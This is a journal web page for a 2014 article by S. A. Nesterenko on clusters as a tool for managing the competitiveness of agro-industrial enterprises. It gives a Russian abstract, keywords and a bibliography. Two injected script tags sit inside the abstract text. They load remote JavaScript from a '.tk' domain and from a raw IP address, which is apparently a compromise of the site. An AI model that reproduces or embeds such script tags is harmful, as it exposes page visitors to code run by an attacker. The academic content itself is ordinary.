ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: [631.152:631.111.4]001.76
Аграрний менеджмент і підприємництво

Кластеры как одна из форм управления конкурентоспособностью предприятий / Нестеренко С.А. // Экономика АПК. - 2014. - № 1 - С. 52

Проведен анализ кластерного подхода в управлении конкурентоспособностью предприятий. Особенно это касается агропромышленного комплекса, который нуждается в самом быстром реформировании. Доказано, что создание кластеров - одна из эффективных форм управления конкурентоспособностью предприятий, направленной на стабильное экономическое развитие хозяйствующих субъектов. Организационное объединение участников в кластеры может быть осуществлено в разных формах - от установления между предприятиями свободных партнерских отношений, основанных на деловом доверии, вплоть к жесткому объединению путем создания юридического лица: в форме объединения, в котором коммерческие негосударственные структуры являются партнерами, а вкладчиками могут быть государственные предприятия. Предложены основные подходы к созданию кластеров, которые необходимы для возрождения отечественного производства, повышения эффективности инновационного развития регионов, достижения высокого уровня экономического развития и конкурентоспособности. Библиогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: аграрный сектор, кластер, кластерный подход, конкуренция, конкурентоспособность, конкурентная сфера, управление конкурентоспособностью

Список использованных источников

 1. Bilskyi V. H. Resursne zabezpechennia pidpryiemstv ahropromyslovoho kompleksu / Bilskyi V. H. // Formuvannia vyrobnychoho potentsialu ta rynku zasobiv vyrobnytstva / Za red. P. T. Sabluka, V. H. Bilskoho. – K.: Urozhai, 1993. – 259 s.
 2. Varnalii Z. S. Rehiony Ukrainy: problemy ta priorytety sotsialno-ekonomichnoho rozvytku: monohrafiia / Z. S. Varnaliia. – K.: Znannia Ukrainy, 2005. – 498 s.
 3. Voinarenko M. P. Mekhanizmy adaptatsii klasternykh modelei do polityko-ekonomichnykh realii Ukrainy // Svitovyi ta vitchyznianyi dosvid zaprovadzhennia novykh vyrobnychykh system (klasteriv) dlia zabezpechennia ekonomichnoho rozvytku terytorii / Materialy konferentsii 1-2 lyst. 2001r. – Kyiv: Spilka ekonomistiv Ukrainy, 2001. – S.25 −33.
 4. Heiets V. M. Rynkovi transformatsii v 1991-2000 r.: zdobutky, trudnoshchi, uroky / V. M. Heiets // Ukraina na porozi 21 stolittia: uroky reform ta stratehiia rozvytku: materialy nauk. konf. / NTUU KPI – K., 2001.– S. 29-41.
 5. Zakon Ukrainy "Pro priorytetni napriamy innovatsiinoi diialnosti v Ukraini" vid 16.03.2003r. #433-IV
 6. Kisil M. I. Investytsiina ta innovatsiina skladovi doktryny ahrarnoi polityky Ukrainy // Ekonomika APK. – 2003. –#7. – S. 82.
 7. Laiko P. A. Yakist silskohospodarskoi produktsii ta produktiv kharchuvannia yak vyrishalna skladova prodovolchoi bezpeky / P A. Laiko, M. F. Babiienko, Ye. A. Buzovskyi, T. D. Ishchenko // Ekonomika APK. – 2005. – # 1. – S. 12 - 21
 8. Melnyk A.F. Derzhavne upravlinnia [pidruch. za red. A.F.Melnyk] / A.F. Melnyk, O.Yu. Obolenskyi, A.Yu. Rasina. – K.: Znannia, 2009. – 582 s.
 9. Nesterenko S.A. Osnovni napriamy pidvyshchennia konkurentospromozhnosti pidpryiemstv / S. A. Nesterenko // Zbirnyk naukovykh prats Tavriiskoho derzhavnoho ahrotekhnolohichnoho universytetu. Seriia: Ekonomichni nauky. – Melitopol, 2012. – # 1 (17), T. 2. – S. 58– 64.
 10. Paskhaver B. Y. Dinamika fondovoi nayavnosti / B. Y. Paskhaver // Ekonomika Ukrainy. – 2002. – # 7. – S. 23 - 32.
 11. Porter M. Konkurentnaya stratehiya: Metodika analiza otraslei y konkurentov / Maikl Porter; Per. s angl. − 3-e yzd.  M.: Alpyna Byznes Buks, 2007. . 453 s.
 12. Porter M. Konkurentnoye preimushchestvo. Kak dostich vysokoho rezultata i obespechit eho ustoichivost / M. Porter. − M. : Alpyna Biznes Buks, 2006. − 715 s.
 13. Hammel G., Prahalad C.K. The Core Competence of the Corporation, Harvard Business Review, 71, May – June 1990, 71: P. 79 – 91.
 14. Commons J.R. Institutional Economics // American Economic Review/ – V.21. – 1931. – PP. 68-657. – Retrieved from: ttp:/www.socserv2.socsci.mcmaster.ca
 15. Edgeworth F.Y. Mathematical Psychics. Mountain Center, CA: James & Gordon, 1995. — 176 p.
 16. Enright M. The Geographical Scope of Competitive Advantage // Stuck in the Region? Changing scales for regional identity / Ed by E. Dirven, J. Grocnewegen and S. van Hoof. - Utrecht, 1993. - P. 87-102.
Читать статью: 14_01_52-56.pdf